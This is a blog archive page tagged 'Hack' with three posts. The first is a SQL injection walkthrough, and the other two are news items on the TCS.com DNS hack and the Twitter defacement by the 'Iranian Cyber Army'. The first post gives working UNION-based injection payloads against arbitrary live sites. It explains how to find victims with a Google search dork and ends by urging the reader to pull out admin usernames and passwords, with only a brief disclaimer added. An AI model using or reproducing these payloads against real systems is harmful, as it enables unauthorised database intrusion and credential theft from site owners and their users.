Archive

Posts Tagged ‘Hack’

How to perform a SQL injection?

February 18, 2010 5 comments

First of all we must know what a ‘SQL injection’ is. So here is the wikipedia definition – ‘ SQL injection is a code injection technique  that exploits a security vulnerability occuring in the database layer of an application ‘ . Here we will confine ourselves to SQL injections in web sites.

Now we need to find out a site link which is likely to be vulnerable and most probably it will be of the form ‘ http://www.site.com/abc.php?id=5 ‘.  If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and take out a result.

1. Check the vulnerability by adding ‘ to the above link.

If you get an error message it means that the site is vulnerable to SQL injection.

Now you can be damn sure that the site is vulnerable to SQL injection.

2. Find out the number of columns

To find number of columns we use statement ORDER BY

Just increment the number until we get an error.

http://www.site.com/abc.php?id=5 order by 1– <– no error

http://www.site.com/abc.php?id=5 order by 2– <– no error

http://www.site.com/abc.php?id=5 order by 3– <– no error

http://www.site.com/abc.php?id=5 order by 4– <– ERROR ( we get some message like Unknown column ‘4’ )

So we can conclude that the table have 4 columns

3. Check whether UNION function works or not

http://www.site.com/abc.php?id=5 union all select 1,2,3–

We will get a number on the screen. Lets say we get the number 2 at this step.

4. Check for MySQL version by replacing 2 in the above step by version()

http://www.site.com/abc.php?id=5 union all select 1,version(),3–

Now you can find the version from the site and only if it is found to above 5, we can continue to the next steps.

// If the version is lower than 5, then we will have to a adopt some new methods which I will explain in some future post //

5. Use information_schema

Why do we use information_schema? The reason is very simple – ‘In mySQL 5 and higher versions, information_schema holds all tables and columns in the database’.

To get tables we use table_name and information_schema.tables

http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables–

6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.

//PLEASE DONT USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES

Advertisements
Categories: Hack Tags: ,

TCS.com hack exposes difference between Google public DNS and open DNS services

February 7, 2010 8 comments

TCS.com belonging to Tata Consulatcny Services was hacked earlier todaya and it is claimed to be a attack over a DNS loophole.

Using nslookup, the diiference between Google public DNS and open DNS were studied.

On using nslookup for openDNS the result for both tcs.com and http://www.tcs.com were the same.

nslookup for tcs.com and www.tcs.com in open DNS

On using nslookup for Google public DNS the result for both tcs.com and http://www.tcs.com were different.

For http://www.tcs.com the Address was 205.178.152.154 while for tcs.com it was 216.15.200.140.
nslookup for www.tcs.com and tcs.com in Google public DNS

Thanks to Albins for pointing out the difference.

Categories: Hack Tags: , , , ,

Twitter Hacked by Iranian Cyber Army

December 18, 2009 1 comment

Twitter, which has become an indispensable part of the web world, came under hacker attack on December 17 by a group claiming to be the “Iranian Cyber Army”. If the screenshots appeared in many sites are to be believed, someone got past Twitter’s defenses. The apparent organization responsible is the “Iranian Cyber Army.”

Twitter Hacked by Iranian Cyber Army Screenshot

Some sites have even translated the text in the above image as given below.

Iranian Cyber Army

THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY

iRANiAN.CYBER.ARMY@GMAIL.COM

U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?
WE PUSH THEM IN EMBARGO LIST
Take Care.

But some sources tell that the above translation is not right and they appeared in many sites in-order to misguide the people who are trying to reveal the actual mystery.

Update

1. Another site hacked by Iranian Cyber Army http://www.mowjcamp.org/

Categories: Twitter Tags: ,